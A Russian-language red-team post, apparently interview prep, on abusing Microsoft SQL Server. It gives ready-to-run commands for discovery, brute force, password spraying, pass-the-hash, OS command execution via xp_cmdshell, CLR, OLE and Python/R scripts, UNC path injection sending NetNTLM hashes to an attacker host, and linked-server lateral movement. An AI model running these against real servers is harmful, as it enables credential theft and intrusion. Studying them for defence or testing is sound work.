🙂Привет, друзья!

На собеседованиях я часто спрашиваю про абьюз Microsoft SQL Server, и, к моему удивлению, многие знают о нём поверхностно. А ведь MSSQL широко используется в корпоративных сетях и при неправильной настройке может стать удобной точкой входа для атакующего.

В этом посте я постарался собрать основные техники абьюза MSSQL, которые помогут лучше понять возможные векторы атак, подготовиться к собеседованию и собрать ваши знания воедино.

📖 Немного теории

Microsoft SQL Server (MSSQL) — это реляционная СУБД от Microsoft, активно используемая в корпоративных сетях для хранения и обработки данных.

Основные компоненты:
🔹 Database Engine — отвечает за хранение, обработку и управление данными.
🔹 SQL Server Agent — автоматизация задач (например, резервное копирование).
🔹 SQL Server Browser — помогает клиентам находить MSSQL-инстансы.
🔹 SSIS (SQL Server Integration Services) — инструмент для интеграции данных.
🔹 SSRS (SQL Server Reporting Services) — генерация отчетов.
🔹 SSAS (SQL Server Analysis Services) — аналитика и обработка данных.

Основные роли в MSSQL:
🔹 sysadmin — полные привилегии на сервере.
🔹 db_owner — полные права в конкретной базе данных.
🔹 db_datareader — доступ только на чтение данных.
🔹 db_datawriter — возможность изменять данные.
🔹 public — назначается всем пользователям по умолчанию и может давать больше доступа, чем кажется.

Способы аутентификации:
🔹Windows Authentication — через доменную аутентификацию (NTLM/Kerberos).
🔹 SQL Authentication — локальные учетные записи MSSQL (sa, пользовательские логины).


Обнаружение MSSQL в сети

Прежде чем “что-то” ломать, нам это “что-то” надо найти.

#PowerUpSQL
Get-SQLInstanceDomain

#nmap
nmap -p 1433 --script ms-sql-info <IP>

#Metasploit
auxiliary/scanner/mssql/mssql_ping

#go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
​

🥰 Доступ к MSSQL

#brute force
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt

#password spraying
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

#Pass-the-Hash
netexec mssql example.com -u usernames.txt -H <NTLM_HASH> --continue-on-success

impacket-mssqlclient DOMAIN/user@IP -hashes <YourHash>  
​

🤪 Повышение привилегий: от локального админа до sysadmin

Основной процесс SQL Server — это sqlservr.exe. Даже если у учетной записи SQL Server в Windows нет высоких привилегий, в самом SQL Server она по умолчанию получает роль sysadmin.

Компрометация службы SQL Server может привести к компрометации всего домена!

Шаг 1: Найдём локальный SQL Server.

# PowerUpSQL
Get-SQLInstanceLocal

Шаг 2: Получаем учетную запись SQL Server

#PowerUpSQL
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name

​
🤗 Выполнение команд в OS через MSSQL

Злоумышленник, имея доступ к MSSQL, может выполнить команды Windows на сервере. Может он это сделать следующими способами:

🔹CLR (Common Language Runtime) Assembly — это механизм в Microsoft SQL Server, который позволяет выполнять .NET-код (C#, VB.NET, etc.) внутри базы данных.

#PowerUpSQL
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

​
🔹OLE Automation Procedures — это механизм в Microsoft SQL Server, который позволяет запускать объекты COM (Component Object Model) напрямую из T-SQL.

#PowerUpSQL
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"

​
🔹xp_cmdshell - встроенная хранимая процедура в Microsoft SQL Server, которая позволяет выполнять команды Windows напрямую из T-SQL

#SQL Server CLI
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

#PowerUpSQL
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"

<продолжение>


🔹External Scripts (Python/R) - механизм в Microsoft SQL Server, который позволяет выполнять Python и R-код

#SQL Server CLI
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))

EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

#PowerUpSQL
#REMOTE
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"

#LOCAL Instance
Get-SQLInstanceLocal | Invoke-SQLOSCmdPyrhon -Verbose -Command "whoami"

Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"

​
👅 UNC Path Injection

Позволяет утянуть NetNTLM-хеш через SMB

#SQL Server CLI
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';

#PowerUpSQL
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost

​
🤪 Lateral Movement через Linked Servers

Linked Servers — это механизм в Microsoft SQL Server, который позволяет подключаться к другим SQL Server'ам или внешним базам данных (MySQL, Oracle, PostgreSQL, файловым источникам и т. д.)

#Просмотр связанных серверов
EXEC sp_linkedservers;

#Выполнение команды на удалённом сервере
EXEC ('whoami') AT [LINKED_SERVER];

#PowerUpSQL
#поиск связанных серверов
Get-SQLServerLink -Instance YourInstance -Verbose

#проверка прав на удаленном сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose

#включаем xp_cmdshell на linked сервере
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"​

На этом всё, друзья! 🎯
Всем удачного хакинга и до новых встреч!

#redteam